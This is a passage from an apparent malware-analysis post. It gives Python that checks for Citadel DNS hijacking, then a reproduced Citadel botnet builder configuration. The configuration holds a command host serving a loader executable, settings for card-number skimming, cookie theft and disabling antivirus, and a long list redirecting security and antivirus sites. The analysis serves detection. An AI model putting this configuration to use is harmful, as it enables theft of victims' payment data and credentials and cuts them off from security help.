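def active_capabilities(cfg: dict) -> list:
    """Descriptions of the capabilities whose StaticConfig value means 'on'."""
    static = cfg.get("StaticConfig", {})
    return [desc for key, (on, desc) in CAPABILITIES.items() if static.get(key) == on]


def dns_sinkholes(cfg: dict) -> dict:
    """host -> forced IP from DnsFilters (nested under DynamicConfig)."""
    filt = cfg.get("DynamicConfig", {}).get("DnsFilters", {})
    return {h: ip for h, ip in filt.items() if h != "_items"}


def hijacked_hosts(cfg: dict, observed: dict) -> list:
    """Hosts whose answer from the suspect machine's own resolver equals the forced IP.
    Citadel leaves the hosts file untouched and forces the answer in name resolution,
    so comparing local answers with an external resolver is the useful check."""
    forced = dns_sinkholes(cfg)
    return sorted(h for h, ip in observed.items() if forced.get(h) == ip)


# Constructed resolver output from a suspect machine (made up for this example).
SAMPLE_LOOKUPS = {
    "bitdefender.com": "209.85.229.104",       # equals the forced IP -> hijacked
    "virustotal.com": "209.85.229.104",        # equals the forced IP -> hijacked
    "zeustracker.abuse.ch": "192.0.2.10",      # hypothetical clean answer
    "example.org": "203.0.113.5",              # not in DnsFilters at all
}

if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    print("active:", active_capabilities(cfg))
    print("hijacked:", hijacked_hosts(cfg, SAMPLE_LOOKUPS))
```

<div class="MsoNormal">
<span style="font-family: Arial;">For this config the script reports both CardSwipe scanners, the MiniAV module, cookie theft and software reporting as active, while the video grabber and the VM check are off; from the constructed lookups it flags bitdefender.com and virustotal.com as hijacked. The same parser can be pointed at the full listing below to pull every DnsFilters host out as an indicator list.</span></div>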
<div class="MsoNormal">
<span style="font-family: Arial; mso-bidi-font-size: 10.0pt;"><br /></span></div>
<br />
<br />
<div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0cm 0cm 1.0pt 0cm;">
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0cm 0cm 1.0pt 0cm; padding: 0cm;">
<br /></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; Default
config + updated AV's list (redirect to google.com)<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; Citadel
Builder 1.3.4.5<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; SHORT
MANUAL BELOW ------------><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
url_config1 is required!!! url_config2 & url_config3 are optional, you can
setup it like a reserve config host.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
report_software - report to gate about installed firewall,antivirus,software: 1
is enabled<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off.
0 is enabled.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it
on a GET parsing by LUHN10 algorithm.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it
on a POST parsing by LUHN10 algorithm(en.wikipedia.org/wiki/Luhn_algorithm).<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
use_module_video 1/0 - Do you really want to use video grabber? If no, please
switch it off. 1 is enabled.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP:// logs
grabber? 1 is enabled.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
package_max_size 50 - logs reports transmission size(KB), stay it as default.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This
option takes exe link from "url_loader" section.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
antiemulation_enable 0/1 - if you enable it, you can't test it on virtual
machines such as VMWare/Virtualbox.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; disable_cookies
0/1 - if you setup 0, then cookies will send to your gate and .sol files will
be deleted. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; For
other information please open the "Personal Manual"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;; IF YOU
DON'T KNOW HOW TO SETUP THESE OPTIONS, YOU CAN USE OPTIMAL DEFAULT CONFIG.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">;;
<------------------ END OF SHORT MANUAL.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">entry
"StaticConfig"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> botnet "main"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_config 15 20<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_logs
7 20<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_stats 10 20<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_modules 7 10<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> timer_autoupdate 8<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> url_config1 "http : //gremlindefault.net/mainsession/game_install.bin"<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> remove_certs 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">; disable_tcpserver 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> disable_cookies 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> disable_httpgrabber 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> report_software 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> disable_antivirus 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> enable_luhn10_get 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> enable_luhn10_post 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> antiemulation_enable 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> encryption_key "*******************************"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> use_module_video 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">end<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">entry
"DynamicConfig"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> url_loader "http : //gremlindefault.net/mainsession/bbbllasw.exe"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> url_server "http : //gremlindefault.net/mainsession/redir.php"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> file_webinjects "webinjects.txt"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "AdvancedConfigs"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "http : //gremlindefault.net/mainsession/game_install.bin"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "WebFilters"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "!http : //*"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "WebDataFilters"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> ;"http : //mail.rambler.ru/*"
"passw;login"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "WebFakes"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> ;"http : //www.google.com" "http
: //www.yahoo.com" "GP" "" ""<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "DnsFilters"<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs51-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs60-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iau.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">licenseupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">csm-as.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wfbs6-icss-p.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">oc.activeupdate.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">update.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">backup.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">backup.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files2.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files2.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.cz.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.cz.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.grisoft.com.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">akamai.avg.com.edgesuite.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">data-cdn.mbamupdates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">su.pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virustotal.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.trendmicro.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securesoft.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avira.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gratissoftwaresite.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasecurity.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoft.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">symantec-norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">housecall.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">malwarebytes.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pchelpforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pchelpforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.cnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">techsupportforum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gratissoftware.nu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">majorgeeks.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.pcworld.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.microbe.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg-antivirus.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nortonantiviruscenter.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">threatmetrix.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonealarm.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">firewallguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">auditmypc.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free-firewall.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">schoonepc.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">iopus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tucows.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg-antivirus-plus-firewall.en.softonic.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">superantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">harveynorman.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ca-store.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">netfreighters.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securetec.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-spyware.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusscan.jotti.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virscan.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivir.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">analysis.avira.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">hijackthis.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uploadmalware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">emsisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kaspersky.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">eset.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gdatasoftware.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pcpro.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cyprotect.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cloudantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">drweb-antivir.it=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">escanav.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nod32.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">av.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vergelijk.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirusvergelijk.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virussen.upc.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.startpagina.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avastav.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">defenx.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gdata.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.nl=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">removevirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">windows.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">answers.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">myantispyware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">krebsonsecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.about.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cleanuninstall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.drsolomon.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">mcafee-at-home.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wwww.mcafee-at-home.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">networkassociates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.networkassociates.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avast.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">onlinescan.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download1.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download2.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download3.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download4.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download5.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download6.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download7.avast.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">au.norton.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trustdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sshop.avg.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pctools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.grisoft.cz=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">free.grisoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">msecn.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.com.ua=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bitdefender.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bitdefender.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
